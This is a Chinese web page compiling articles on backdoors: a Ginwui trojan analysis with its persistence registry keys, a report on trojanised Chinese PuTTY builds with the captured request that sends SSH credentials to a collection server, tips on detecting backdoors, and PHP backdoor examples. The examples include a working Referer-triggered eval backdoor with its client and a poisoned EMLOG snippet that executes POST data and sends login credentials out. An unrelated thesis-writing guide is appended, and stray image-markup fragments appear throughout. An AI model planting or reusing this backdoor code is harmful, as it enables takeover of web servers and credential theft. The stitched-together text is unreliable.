当前位置：首页 > 实用文档 > 其他范文> Ginwui后门程序分析

Ginwui后门程序分析

时间：2022-05-14 17:42:19 其他范文收藏本文下载本文

Ginwui后门程序分析（精选8篇）由网友“你滴岛岛”投稿提供，以下文章小编为您整理的Ginwui后门程序分析，供大家阅读。

Ginwui后门程序分析

篇1：Ginwui后门程序分析

今年5月19日CVE发布编号为CVE--2492安全公告，Microsoft Word处理DOC文件存在缓冲区溢出漏洞，Microsoft Word运行特殊构造的doc文件，导致执行任意代码，远程攻击者可以利用此漏洞通过诱骗用户打开恶意DOC文件在用户机器上执行任意指令。微软于6月13号发布该漏洞的补丁。5月24日发现攻击者利用此漏洞构造特殊的Word文档进行传播，存在漏洞的Word打开该文档将导致文件中的后门Ginwui.exe运行，下面我们分析这个后门的运作机制。

一、 Ginwui.exe的行为分析

Ginwui.exe将自身复制为临时目录下的20060426.bak，然后执行20060426.bak并删除原程序文件Ginwui.exe。20060426.bak文件释放zsydll.dll和zsyhide.dll到%windir%system32目录下并将zsydll.dll注入Winlogon.exe进程中。Winlogon.exe启动%ProgramFiles%Internet ExplorerIEXPLORE.EXE,并连接域名scfzf.xicp.net 。zsyhide.dll在注册表AppInit_DLLs键下添加%windir%system32zsyhide.dll，zsydll.dll在注册表创建zsydll项以便系统重启后重新加载运行。

zsyhide.dll文件注册表详细导出：

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWindows]

AppInit_DLLs=C:WINNTsystem32zsyhide.dll

zsydll.dll文件注册表详细导出：

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonNotifyzsydll]

DllName=C:WINNTsystem32zsydll.dll

Shutdown=DoShutdown

Startup=DoStartup

Asynchronous=dword:00000001

Impersonate=dword:00000000

二、 Ginwui.exe的清除方法

系统重启后执行cmd.exe，把%windir%system32目录下的zsydll.dll和zsyhide.dll改名，删除在注册表中的zsydll项和AppInit_DLLs项下的C:WINNTsystem32zsyhide.dll键值，

重启系统把%windir%system32目录下的zsyhide.dll和zsydll.dll删除（改名后的文件），临时目录下的20060426.bak可以直接删除。

三、危害

远程攻击者完全控制被攻击的主机，拥有系统权限，可以对系统进行任意操作。比如盗取用户的帐户和口令、个人信息、信用卡帐户等。

四、传播方式

Ginwui.exe是目前利用WORD漏洞进行传播的木马程序，从上面分析来看不仅可以利用WORD漏洞进行传播，还可以利用以前的IE漏洞、FLASH漏洞等方式来进行传播。

五、防范措施

6月13日微软发布等级为严重的安全公告 MS06-027（Microsoft Word 中的漏洞可能允许远程执行代码），该漏洞利用格式错误的对象指针的 Word 中存在一个远程执行代码漏洞。攻击者可以通过构建特制的 Word 文件来利用此漏洞，此文件可能允许远程执行代码。微软针对此漏洞已发布安全补丁，请及时更新。

临时解决方法是以安全模式的方式运行该软件－－在Word的快捷方式中添加命令行“WINWORD.EXE /safe”。请及时更新杀毒软件的病毒库。使用防火墙规则禁止系统从内部对localhosts.3322.org和scfzf.xicp.net进行连接。

微软及杀毒厂商已经把Ginwui.exe定义为Ginwui.B或Backdoor.Win32.Ginwui.b后门病毒。

篇2：什么是后门程序及后门的分类

什么是后门程序后门程序又称特洛伊木马，其用途在于潜伏在电脑中，从事搜集信息或便于进入的动作，

什么是后门程序及后门的分类

，

后程序和电脑病毒最大的差别，在于后门程序不一定有自我复制的动作，也就是后门程序不一定会感染其他电脑。后门是一种登录系统的方法，它不仅绕过系统

篇3：中文版putty后门事件分析

近几日，中文版putty等SSH远程管理工具被曝出存在后门，该后门会自动窃取管理员所输入的SSH用户名与口令，并将其发送至指定服务器上，知道创宇安全研究小组在第一时间获取该消息后，对此次事件进行了跟踪和分析

根据分析，此次事件涉及到来自putty.org.cn、putty.ws、winscp.cc和sshsecure.com站点的中文版putty、 WinSCP、SSHSecure和psftp等软件，而这些软件的英文版本不受影响。

1．时间线

1月25日：有网友发布消息称putty和winscp中装有后门程序，但该条微博并未提及后门程序的类型及其技术细节，而且消息也未被过多的人所重视，目前无法确定该条微博是否与此次事件有关联：

570)?'570px':'auto';}“ height=”132“ src=”img2.shangxueba.com/img/jb51_jbImg/0717/11/FB9E439E6C6A293865190D13CDAB7C5A.png“ width=”339“ alt=”“ />

1月30日下午16点左右：互联网上再度出现关于中文版putty等SSH管理软件被装有后门的消息，并且此消息对后门的行为特征进行了简要的描述 —— 该程序会导致root密码丢失，但发布者仍未披露具体的技术细节：

570)?'570px':'auto';}” height=“1” src=“img2.shangxueba.com/img/jb51_jbImg/20140717/11/3C99244DDC7C2C5A531FA26CE644076A.png” width=“1” alt=“” />

以上微博的短URL所对应的文章截图如下：

570)?'570px':'auto';}“ height=”454“ src=”img2.shangxueba.com/img/jb51_jbImg/20140717/11/217AEF684BADC7E6A74544E2C8C273DD.png“ width=”791“ alt=”“ />

1月31日：经过一晚的酝酿，putty事件开始在互联网上广泛传播，微博、论坛等信息发布平台上开始大量出现putty后门事件的消息，同时，很多技术人员也开始对含有后门的putty等SSH管理软件进行技术分析，并陆续发布其中的技术细节。

2．事件分析

2.1问题软件源头

知道创宇安全研究团队在获取信息后，第一时间对putty等软件进行了跟踪分析。通过分析发现，来自以下几个站点的中文版putty、WinSCP、SSHSecure和psftp等软件都可能存在后门程序：

www.putty.org.cn

www.putty.ws

www.winscp.cc

www.sshsecure.com

2.2行为分析

2.2.1网络行为分析

使用带有后门程序的中文版putty等SSH管理软件连接服务器时，程序会自动记录登录时的用户名、密码和服务器IP地址等信息，并会以HTTP的方式将这些信息发送到指定的服务器上，以下是在分析过程中抓取到的原始HTTP数据：

GET /yj33/js2.asp?act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/0613 Firefox/6.0a2

Host: l.ip-163.com:88

Pragma: no-cache

从以上数据可以获得以下信息：

敏感信息通过HTTP GET的方式发送到服务器l.ip-163.com上（经测试，该域名与putty.org.cn位于同一IP地址上）

用于收集密码的程序地址为 l.ip-163.com:88/yj33/js2.asp

敏感信息以GET参数的方式发送到服务器上，相关参数为：

act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY

每个字段的作用如下：

act为执行的动作，参数add用于添加信息，经测试，也可使用del来删除信息

user为SSH服务器的IP地址，此处为50.23.79.188

pwd为连接服务器时的登录用户名，此处为abc

ll1为登录密码，此处为pass

ll2为目标服务器的SSH端口，此处为22（即，默认端口）

ll3则为客户端类型，此处为PuTTY

2.2.2服务器本地文件分析

知道创宇安全研究团队借助文件完整性校验的方式，对服务器初始安全状态下的 /etc、/lib、/usr、/bin等敏感目录进行了完整性备份，并在putty连接测试后对这些目录的文件变更、丢失和添加等情况进行了校验，校验结果显示，中文版putty并未对服务器自动安装后门程序，

网络上部分消息称，有些使用中文版putty进行过远程管理的服务器上出现恶意代码和文件，可能是由于恶意用户获取了putty所收集的密码后人为植入所致。

2.3事件后续

截止至2月1日，在本次事件中所涉及的以下域名均已不能访问：

www.putty.org.cn

putty.ws

www.winscp.cc

www.sshsecure.com

l.ip-163.com:88

但是，在1月31日晚，网络上传出“l.ip-163.com被黑”的消息并配有一张“受害者列表”的截图：

570)?'570px':'auto';}” height=“593” src=“img2.shangxueba.com/img/jb51_jbImg/20140717/11/5D4B7325928CB5A9C9DD81AE9F6954EB.png” width=“549” alt=“” />

而就在此消息发布不久之后，互联网上便出现了完整的受害者列表供所有用户浏览和下载，根据这份来自互联网列表的显示，不但有众多位列其中，IBM、Oracle、HP等大厂商的服务器也出现在列表内。

3．安全建议

若您使用过中文版的putty、WinSCP、SSHSecure和psftp等软件，但暂时又不能对服务器进行下线处理，可采取以下临时解决方案来处理：

使用chkrootkit或rootkit hunter对服务器进行扫描，检查是否存在已知后门

查看网络是否有可疑外联，并加强对可疑外联的监控

在网络层建立端口访问控制策略，阻止除正常业务外的一切非业务、非管理端口

更换SSH登录密码，建议登录时使用证书加密码的组合方式进行身份验证

登录SSH时，不要直接使用root用户，先使用普通用户登录后，再su至root

服务器端通过TCP Wrapper或iptables等软件，限制IP访问，仅允许特定IP地址对服务器的SSH进行连接和管理

如需使用putty、WinSCP等软件，可访问其官方站点下载：

www.putty.org/

winscp.net/eng/docs/lang:chs

篇4：安全工具暗藏杀机：快速识别后门程序

一些热衷于安全方面的朋友可能会遇到这样的困惑，在某些网站下载的工具本身就含有后门，这有点像网络中的“无间道”，我们先暂且不论到底是如何出现这种情况的，单单看一下如何才能将这些后门揪出来吧。

那么如何检测自己所使用的工具中是否含有后门呢？对于有一定经验的高手而言可以使用WSockExpert进行网络数据抓包，如果系统中没有WSockExpert，可以使用Netstat命令，用于显示协议统计信息和当前TCP/IP网络连接及端口占用信息。

1.关闭系统中所有可能连接网络的程序，然后只登录某个程序，打开命令提示符，输入并执行“Netstat -an>C:NET1.TXT”命令，将未运行木马前的网络连接状态保存在C:NET1.TXT之中，关闭程序，

2.运行“后门，配置并生成木马程序。

3.运行生成的QQ木马程序后重新登录程序。打开命令提示符，输入并执行“Netstat -an>C:NET2.TXT”命令，将运行木马后的网络连接保存在C:NET2.TXT中。

5.比较NET1.TXT和NET2.TXT我们会发现在NET2.TXT中多出了几个网络地址，而除了我们配置得到木马的连接地址外，其它就是后门了。

在用Netstat进行后门测试时要注意：Netstat并不能立即返回当前的网络连接状态，会有延迟，也就是说我们执行Netstat后看到的网络连接状态很可能是3秒钟以前的，不过这并不影响我们对后门的测试。

最后告诉大家，并不是所有的程序都能通过这种方式检测，比如扫描类工具，面对很多动态网络环境的操作，会造成多个变化的网络地址加入到程序中来。

篇5：一些常见的PHP后门原理分析

通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码，来达到后门的效果

本地测试结果如下图，

本程序只作为学习作用，请勿拿去做坏事。

复制代码

代码如下:

//1.php

header('Content-type:text/html;charset=utf-8');

parse_str($_SERVER['HTTP_REFERER'], $a);

if(reset($a) == '10' && count($a) == 9) {

eval(base64_decode(str_replace(“ ”, “+”, implode(array_slice($a, 6)))));

}

//2.php

header('Content-type:text/html;charset=utf-8');

//要执行的代码

$code = <<

phpinfo;

CODE;

//进行base64编码

$code = base64_encode($code);

//构造referer字符串

$referer = “a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=”;

//后门url

$url = 'localhost/test1/1.php';

$ch = curl_init();

$options = array(

CURLOPT_URL => $url,

CURLOPT_HEADER => FALSE,

CURLOPT_RETURNTRANSFER => TRUE,

CURLOPT_REFERER => $referer

);

curl_setopt_array($ch, $options);

echo curl_exec($ch);

最近EMLOG源代码被污染，有些用户下载的出现了以下的后门代码

复制代码

代码如下:

if (isset($_GET[“rsdsrv”])) {

if($_GET[“rsdsrv”] == “20c6868249a44b0ab92146eac6211aeefcf68eec”){

@preg_replace(“//e”,$_POST['IN_EMLOG'],“Unauthorization”);

}

file_get_contents(“某域名/?url=”.base64_encode($_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']).“&username=”.base64_encode($username).“&password=”.base64_encode($password));

篇6：分析毕业论文写作程序

一、明确认识，端正态度

毕业论文写作是开放教育本、专科各专业的必修课程，它是对学生所学知识和理论进行综合运用的培训，旨在培养学生的专业研究素质，提高分析和解决问题的能力，使学生的创新意识和专业素质得到提高，创造性得以发挥。所以，每个学生一定要把毕业论文写作作为一次总结性、实践性、创造性、专业性、理论性都得到充分体现的学习和研究过程来完成毕业论文写作，认真对待毕业论文写作程序中每一个环节，决不允许马虎应付，抄袭剽窃，捉刀搪塞的现象存在。

二、驾轻就熟，认真选题

（一）选题范围

论文选题应符合专业培养教育目标和要求，以所学专业课的内容为主，不应脱离专业范围。

（二）写你最熟悉的

这么多内容可以写，到底选个什么题呢？那就写你最熟悉的。就是平时接触最多、最了解的，思考得最多、感触最深的社会现象或理论问题，尤其是与你工作有密切关联的事物。

（三）论题大小适中，宁小勿大

论题与材料要匹配。根据你掌握的材料确定论题，做到大小适中，千万不要把论题搞得很大。对材料要多次筛选，看哪一类材料最扎实，最能以小见大地去说明一个问题，就以这类材料为主干，论题就自然出来了。

（四）要具有综合性和学术性

我们写作的论题，一般都是社会热点问题或普遍存在的问题，你不能跟在别人的屁股后面转，你一定要提出自己的独到见解，或者在探索方法、论证途径上另辟蹊径。这样才具有综合性、学术性。本科的毕业论文一定要基本达到这个高度。

三、精心组织材料，合乎逻辑地证明论题

（一）论据要充足

论据就是构成论文的素材或叫材料，包括现成的理论观点和事实、数据等。材料要可靠、真实、典型、丰富，足以说明论题

（二）论证要有逻辑性

论证就是运用材料去证明论题的过程，就是使材料与论题之间构成一种联系。有逻辑性是指这种联系是必然的、内在的。不要违反三个逻辑规律，即同一律（不偷换前提）、不矛盾律（不自相矛盾）、排中律（没有漏洞）。论证方法主要是演绎和归纳的方法，演绎是从大道理到小道理，把已知的真理具体到你的论题上来；归纳是从小道理到大道理，或从一系列事实中得出共同的性质或规律。一个材料，从不同角度可以说明不同问题，你要巧妙地选取角度去深刻挖掘材料的内含，更好地为证明你的论题服务。

（三）结构要合理，层次要分明，语言要流畅

根据论题和材料谋篇布局，确定文章的结构。一般布局是这样的：

1 引出论题

引出论题要“开门见山”，文字简洁，200字左右为宜。

2分层次论证

总结性、评介性论文的论证层次一般是：

情况和问题；

经验或原因；

评价--意义或影响；

措施或对策。

说理性论文的层次有两种分法：

一种是平行展开式：同一层次上的内容是平行的，各个方面（可用小标题概括）从不同侧面说明论题（或分论题）。